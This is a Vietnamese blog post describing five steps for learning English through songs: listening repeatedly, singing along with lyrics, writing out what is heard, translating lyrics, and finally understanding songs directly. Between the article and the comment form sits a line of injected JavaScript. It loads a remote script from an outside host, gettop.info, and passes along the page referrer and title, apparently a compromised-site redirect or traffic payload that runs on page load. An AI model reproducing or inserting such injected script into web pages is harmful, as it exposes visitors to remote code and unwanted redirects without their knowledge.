5 bước học tiếng anh hiệu quả qua bài hát

 

Tiếng anh ngày nay ngày càng trở nên quan trọng. Tuy nhiên, để học tốt tiếng Anh, và đặc biệt là hoàn thiện được kỹ năng phát âm thì không phải ai cũng có thể làm được. Có rất nhiều cách học nhưng bạn nên chọn cho mình phương pháp mà bạn thấy thoải mái mà không gây áp lực, nhàm chán nhé. Cách mà tôi chia sẻ hôm nay chính là học tiếng anh qua bài hát

 

Để học tiếng Anh bằng nhạc, tốt nhất bạn hãy sử dụng những bản nhạc của thập niên 80, 90, và những bản Rock ballad, Pop hoặc Country nhẹ nhàng, hạn chế sử dụng những bản Rock, R&B, Rap hay những thể loại mang tính chất gây mê như Jazz, hoặc tịnh tâm như NewAge… Bạn hãy nhanh tay dùng giấy bút ghi lại những bản nhạc yêu thích để chuẩn bị cho việc học nào .

 

Bước 1: Nghe nhạc

 

nghe nhac

 

 

Bạn chỉ cần nghe liên tục, nghe tất cả những bản nhạc tiếng Anh ma bạn yêu thích, nghe đi nghe lại, và nghe mọi lúc, mọi nơi mà bạn có thể.

Khi nghe nhạc, thì khả năng nhớ của con người được tăng lên đáng kể, chính vì thế, bạn nghe nhạc để làm quen với mặt chữ, làm quen với cách phát âm, và làm quen với tiếng Anh – một cách làm quen rất thoải mái. Bản thân tôi rút ra được khi nghe nhạc nhiều đó là giúp cho tối  có một phản xạ rất tốt với mặt chữ, cách nối từ, và tiếng nói.

 

Bước 2: Nhẩm và hát theo

 

Tôi thưởng lên youtube để xem lyric bài hát, và nhẩm theo bài hát một cách kiên nhẫn theo trình tự sau: Đọc, đọc thật từ tốn, từng chữ một, xem cho thật giống với giọng hát. Hát, hát theo giọng của ca sĩ, không cần đúng tông, chỉ cần theo kịp nhịp và chạy từ.

Chú ý: Bạn nên cố gắng phát âm thật chuẩn càng giống với giọng phát âm của ca sĩ chừng nào càng tốt, kể cả cách bắt chước nối từ, và nhớ gạch dưới những từ đọc nối trong lời bản nhạc.

Làm tốt ở bước này bạn sẽ cảm nhận khả năng phát âm của mình nâng lên trình độ mới .

 

lyric

 

 

Bước 3:  Nghe và viết lại

 

Chọn bài hát yêu thích nào đó. Nghe nhiều lần rồi viết những gì mà bạn nghe thấy vào giấy. Đừng quan tâm tới việc đúng hay sai, giữ tinh thần thoải mái không nên tự gây áp lực. Sau đó, bạn có thể lên internet để tra xem lời của bài hát. Qua lời bài hát, bạn có thể củng cố ngữ pháp, cách viết tiếng anh .

Bạn có thể chơi điền từ còn thiếu trong bài hát qua một vài game nhỏ. Thường thì tôi hay lên baidich.com để giải trí. Hiệu quả của nó cũng tốt lắm đấy

 

dien tu

 

Bước 4: Dịch bài

 

Việc dịch lời bài hát tiếng anh sang tiếng việt không phải là chuyện dễ. Bạn cần phải nhẫn nại, kiên trì . Trong giai đoạn đầu, bạn chỉ cần dịch sát nghĩa và đúng nghĩa những gì ghi trong bài hát. Sau đó, bạn bắt đầu nâng cấp bằng cách làm gọn hoặc viết cho mượt mà hơn, cũng như có thể điều chỉnh để chuyển lời Anh thành lời Việt để có thể hát được.

 

Bước 5: Hiểu luôn những gì khi ca khúc vang lên

 

Đây là lúc bạn gần như là một người có thể giao tiếp hoàn thiện bằng tiếng Anh mà không còn ngại ngùng bất cứ điều gì.

Nghe bài hát tiếng anh mà như nghe tiếng việt thì còn gì bằng đúng không các bạn. Trải qua 5 bước trên một cách kiên trì thì tiếng anh đâu khó như nhiều người nghĩ nữa.

Trên đây chỉ là một trong vô vàn cách học , chúc các bạn đạt được kết quả tốt nhất như mong muốn.

 var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 Trả lời “5 bước học tiếng anh hiệu quả qua bài hát

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *